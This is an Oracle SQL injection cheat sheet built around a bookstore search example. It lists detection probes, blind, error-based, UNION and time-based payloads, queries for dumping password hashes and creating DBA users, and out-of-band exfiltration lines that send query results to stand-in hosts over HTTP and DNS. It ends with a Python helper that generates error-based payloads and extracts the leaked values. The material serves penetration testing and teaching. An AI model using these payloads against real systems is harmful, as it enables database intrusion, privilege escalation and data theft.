For every input parameter that has to be checked for SQL injection, take as the example a web application that lets users search for books by author name:
http://www.example.com/pls/bookstore/books.search?author=DICKENS
This request returns the list of books by Charles Dickens.
http://www.example.com/pls/bookstore/books.search?author=DICK'ENS
This request returns a 404 Not Found or some other error: the extra quote unbalances the string literal inside the SQL statement. To confirm that the error really is an Oracle SQL injection rather than input filtering, use Oracle's string concatenation operator ||:
http://www.example.com/pls/bookstore/books.search?author=DICK'||'ENS
If this request again returns the list of books by Charles Dickens, the application is vulnerable to SQL injection: the parameter was pasted into the SQL text, so the database evaluated 'DICK'||'ENS' back to 'DICKENS'. An application that binds the parameter would instead search for the literal string DICK'||'ENS and return nothing.
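The three-request test above, as an added example that is not code from the original page: it runs the probe against an in-memory SQLite database standing in for Oracle. SQLite also treats || as string concatenation, which is the only database behaviour the test depends on. The books table, its rows, and the two search functions (search_vulnerable, which splices the parameter into the SQL text, and search_safe, which binds it) are constructed for this demonstration.

```python
"""Added example, not from the original page.

Reproduces the three-request concatenation test (DICKENS, DICK'ENS,
DICK'||'ENS) against an in-memory SQLite database used as a stand-in for
Oracle: SQLite also treats || as string concatenation, which is the only
database behaviour the test depends on.  The books table, its rows and
both search functions are constructed for this demonstration.
"""
import sqlite3
from typing import Callable, Dict, List


def make_db() -> sqlite3.Connection:
    """Constructed sample bookstore: two authors, three titles."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE books (title TEXT, author TEXT)")
    con.executemany(
        "INSERT INTO books VALUES (?, ?)",
        [("Bleak House", "DICKENS"), ("Hard Times", "DICKENS"), ("Emma", "AUSTEN")],
    )
    return con


def search_vulnerable(con: sqlite3.Connection, author: str) -> List[str]:
    """The bug behind books.search?author=...: the parameter is pasted into the SQL text."""
    sql = "SELECT title FROM books WHERE author = '" + author + "' ORDER BY title"
    return [row[0] for row in con.execute(sql)]


def search_safe(con: sqlite3.Connection, author: str) -> List[str]:
    """Same query with a bind parameter: the input is data, never SQL."""
    sql = "SELECT title FROM books WHERE author = ? ORDER BY title"
    return [row[0] for row in con.execute(sql, (author,))]


def probe(con: sqlite3.Connection,
          search: Callable[[sqlite3.Connection, str], List[str]],
          baseline: str = "DICKENS",
          cut: int = 4) -> Dict[str, bool]:
    """Run the three requests from the text and decide whether the parameter is injectable."""
    good = search(con, baseline)                        # request 1: normal value
    try:                                                # request 2: lone quote (DICK'ENS)
        search(con, baseline[:cut] + "'" + baseline[cut:])
        quote_error = False
    except sqlite3.OperationalError:                    # the app would show a 404 / error page
        quote_error = True
    try:                                                # request 3: quote closed with || (DICK'||'ENS)
        concat = search(con, baseline[:cut] + "'||'" + baseline[cut:])
    except sqlite3.OperationalError:
        concat = []
    concat_matches = bool(good) and concat == good
    # Injectable only if the quote broke the statement AND the database
    # evaluated '||' back to the original value.  A bound query raises no
    # error and simply finds no rows for either probe value.
    return {"quote_error": quote_error,
            "concat_matches": concat_matches,
            "injectable": quote_error and concat_matches}


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(db, search_vulnerable))
    print("bound     :", probe(db, search_safe))
```

The decisive signal is the third request: an error on the quote alone could come from a filter, but only a database that received the unquoted text can turn 'DICK'||'ENS' back into the baseline result set.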
Payload list
Version SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT version FROM v$instance;
Current User SELECT user FROM dual
Current Database SELECT instance_name FROM v$instance;
Quick Detection
Error Based SQLi For integer inputs : (utl_inaddr.get_host_address((select user from DUAL)))
For string inputs : ' + (utl_inaddr.get_host_address((select user from DUAL))) + '
Both payloads should raise an error that carries the value. When the current user name cannot be resolved as a host name (the usual case), UTL_INADDR raises ORA-29257 "host <name> unknown" with the value in the message; if it does resolve, the returned IP string fails numeric conversion (ORA-01722). Note that + is arithmetic in Oracle (string concatenation is ||), which is exactly what forces the conversion error in the string variant.
Clear SQLi Tests
These simple tests are good for boolean-based SQL injection and for quiet probing: id=5-1 must return the same page as id=4 if the database evaluates the arithmetic, and id=4 OR 1=1 should change the result set.
product.asp?id=4
product.asp?id=5-1
product.asp?id=4 OR 1=1
Blind SQL Injection
) AND 1=0 AND (1=1
) AND 1=1 AND (1=1
AND 1=0
AND 1=1
') AND 1=0 AND ('a'='a
') AND 1=1 AND ('a'='a
' AND 1=0 AND 'a'='a
' AND 1=1 AND 'a'='a
%' AND 1=0 AND '%'='
%' AND 1=1 AND '%'='
AND 1=0-- JBrD
AND 1=1-- EcCC
Blind SQL Injection (Time Based)
select dbms_pipe.receive_message((chr(95)||chr(96)||chr(97)),10) from dual
(The + signs in the usual URL-encoded form of this payload are spaces. receive_message(pipename, timeout) returns after timeout seconds when nothing is written to the pipe; always pass a timeout, otherwise the call blocks for DBMS_PIPE.MAXWAIT, effectively forever.)
Line Comments
Username: admin'--
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
If Statements (PL/SQL anonymous block; only usable where the injected text lands inside PL/SQL, e.g. a procedure that runs EXECUTE IMMEDIATE on the input, not inside a plain SELECT)
BEGIN
IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;
String without Quotes
SELECT CHR(75)||CHR(76)||CHR(77)
This will return 'KLM'.
UNION query
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
(In Oracle the column count and data types of both SELECTs must match; pad with NULL or CHR() literals until they do.)
Command Execution
Creating JAVA library
DBMS_SCHEDULER
EXTPROC
PL/SQL native make utility (9i only)
Each of these is a post-exploitation route that needs privileges beyond a plain SELECT (for example CREATE LIBRARY for EXTPROC, CREATE JOB for DBMS_SCHEDULER, and Java runtime permissions granted through DBMS_JAVA.GRANT_PERMISSION for a Java stored procedure that spawns a process).
Create Users
CREATE USER user IDENTIFIED by pass;
Drop Users
DROP USER user
Make User DBA
GRANT DBA to USER
List Users
SELECT name FROM sys.user$ where type#=1
SELECT * FROM all_users
List Password Hashes
SELECT name, password FROM sys.user$ where type#=1
(Requires access to SYS.USER$, i.e. SYS or SELECT ANY DICTIONARY. The password column holds the pre-11g DES hash; from 11g on the SHA-1 based hash is stored in the spare4 column of the same table.)
List Schemas (Oracle has no list of databases to enumerate; the table owners are the schemas)
SELECT DISTINCT owner FROM all_tables
Privileges
SELECT * FROM session_privs
SELECT * FROM dba_role_privs
SELECT * FROM dba_sys_privs
SELECT * FROM user_tab_privs
Other Components
SELECT * FROM dba_registry
Getting user defined tables
SELECT * FROM all_tables where OWNER='DATABASE_NAME'
(DATABASE_NAME is a schema owner as returned by the query above, not a database.)
Getting Column Names
SELECT * FROM all_col_comments WHERE TABLE_NAME='TABLE'
Default tablespaces (Oracle has no separate default databases; SYSTEM and SYSAUX are the tablespaces present in every instance)
SYSTEM
SYSAUX
Path of DB files
SELECT name FROM V$DATAFILE
SELECT * FROM dba_directories
Time Based SQLi Exploitation
?vulnerableParam=(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100) THEN dbms_pipe.receive_message(('xyz'),14) ELSE dbms_pipe.receive_message(('xyz'),1) END FROM dual)
{INJECTION} = the query whose value you want to test (it must return a single value).
If the condition is true the response is delayed by 14 seconds; if it is false, by one second. receive_message itself returns 1 (timeout) in both cases, so the delay is the only signal; walk the SUBSTR position and the ASCII value one at a time to read the value out.
Out of Band Channel
(UTL_HTTP, UTL_INADDR and DBMS_LDAP need EXECUTE on the package and, from 11g on, a network ACL entry that lets the database user reach the target host; without it the call fails with ORA-24247 and nothing leaves the database.)
?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/sniff.php?sniff='||({INJECTION})||'') FROM DUAL)
The sniffer application saves the results
?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/'||({INJECTION})||'.html') FROM DUAL)
Results will be saved in the HTTP access logs
?vulnerableParam=(SELECT UTL_INADDR.GET_HOST_ADDRESS(({INJECTION})||'.yourhost.com') FROM DUAL)
You need to sniff DNS resolution requests to yourhost.com
?vulnerableParam=(SELECT SYS.DBMS_LDAP.INIT(({INJECTION})||'.yourhost.com',80) FROM DUAL)
You need to sniff DNS resolution requests to yourhost.com
{INJECTION} = the query whose result you want to exfiltrate. For the DNS variants the result must form a valid host label (letters, digits and hyphens, at most 63 characters per label), so encode or chunk anything else.
Error-based XMLType
select XMLType((select substr(version,1,1) from v$instance)) from dual;
(A one-character value is not well-formed XML, so the parser error LPX-00210 "expected '<' instead of '1'" quotes the character back.)
Error-based UTL_INADDR.GET_HOST_ADDRESS (in this and the following payloads the CHR() sequences build the marker strings qxzzq and qjvxq around the value, so the result can be located inside the error message)
) AND 1=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(120)||CHR(113))-- pRUk
Error-based CTXSYS.DRITHSX.SN
) AND 5883=CTXSYS.DRITHSX.SN(5883,(CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (5883=5883) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(120)||CHR(113)))-- YEEf
Error-based DBMS_UTILITY.SQLID_TO_SQLHASH
) AND 7516=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7516=7516) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(120)||CHR(113)))-- ulPq
Error-based - Parameter replace
(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6501=6501) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)
Oracle inline queries
(SELECT CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6556=6556) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(120)||CHR(113) FROM DUAL)
Oracle stacked queries
(Stacked queries generally do not work against Oracle through application drivers, which execute one statement at a time; the payloads below only apply where the injection lands inside a PL/SQL block. A PL/SQL block has to be closed with END; before the comment.)
Oracle stacked queries heavy query
);SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--
Oracle stacked queries DBMS_LOCK.SLEEP
);BEGIN DBMS_LOCK.SLEEP(10); END;--
Oracle stacked queries USER_LOCK.SLEEP
);BEGIN USER_LOCK.SLEEP(10); END;--
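The marker-delimited error-based payloads above (UTL_INADDR.GET_HOST_ADDRESS, CTXSYS.DRITHSX.SN, DBMS_UTILITY.SQLID_TO_SQLHASH and the XMLType parameter replace), as an added example that is not code from the original page: it rebuilds each payload from an arbitrary sub-select, using CHR() so no quote character is needed, and pulls the result back out of the error text between the qxzzq / qjvxq markers. The sample error responses are constructed for the demo in the documented ORA-29257 format and the helper names are assumptions.

```python
"""Added example, not from the original page.

Builds the marker-wrapped error-based payloads above (UTL_INADDR,
CTXSYS.DRITHSX.SN, DBMS_UTILITY.SQLID_TO_SQLHASH, XMLType) from an
arbitrary sub-select and pulls the result back out of the ORA- error
text.  The CHR() sequences on the page decode to the delimiters 'qxzzq'
and 'qjvxq'; the sample error responses below are constructed for the
demo and the helper names are assumptions.
"""
import html
import re
from typing import Optional

START = "".join(chr(c) for c in (113, 120, 122, 122, 113))   # CHR(113)||CHR(120)||... -> 'qxzzq'
END = "".join(chr(c) for c in (113, 106, 118, 120, 113))     # CHR(113)||CHR(106)||... -> 'qjvxq'


def chr_concat(text: str) -> str:
    """Write a string as CHR(n)||CHR(n)... so the payload needs no quote characters."""
    return "||".join("CHR(%d)" % ord(c) for c in text)


def wrapped(injection: str) -> str:
    """START || (sub-select) || END: the value every variant forces into an error message."""
    return chr_concat(START) + "||(" + injection + ")||" + chr_concat(END)


def utl_inaddr_payload(injection: str) -> str:
    # ORA-29257 echoes the unresolvable "host name", i.e. our wrapped value.
    return ") AND 1=UTL_INADDR.GET_HOST_ADDRESS(" + wrapped(injection) + ")-- "


def drithsx_payload(injection: str, n: int = 5883) -> str:
    return ") AND %d=CTXSYS.DRITHSX.SN(%d,(%s))-- " % (n, n, wrapped(injection))


def sqlhash_payload(injection: str, n: int = 7516) -> str:
    return ") AND %d=DBMS_UTILITY.SQLID_TO_SQLHASH((%s))-- " % (n, wrapped(injection))


def xmltype_payload(injection: str) -> str:
    # '<:' + value + '>' is not well-formed XML, so the parser error quotes it back.
    return ("(SELECT UPPER(XMLType(" + chr_concat("<:") + "||" + wrapped(injection)
            + "||" + chr_concat(">") + ")) FROM DUAL)")


_RESULT = re.compile(re.escape(START) + r"(.*?)" + re.escape(END), re.DOTALL)


def extract(response_body: str) -> Optional[str]:
    """Return the text between the markers anywhere in the response, or None when the
    error was not echoed (generic error page, markers stripped, condition not reached)."""
    m = _RESULT.search(html.unescape(response_body))   # error pages are often HTML-escaped
    return m.group(1) if m else None


if __name__ == "__main__":
    print(utl_inaddr_payload("SELECT user FROM dual"))
    # Constructed responses in the documented ORA-29257 format, plus a generic page.
    print(extract("ORA-29257: host qxzzqSYSTEMqjvxq unknown"))
    print(extract("&lt;pre&gt;ORA-29257: host qxzzqSYSTEMqjvxq unknown&lt;/pre&gt;"))
    print(extract("HTTP 500 Internal Server Error"))
```

The sub-select must return a single row and a string-typed value; wrap numbers in TO_CHAR and long results in SUBSTR, since the echoed host name or XML fragment in the error message is short and anything past it is silently lost.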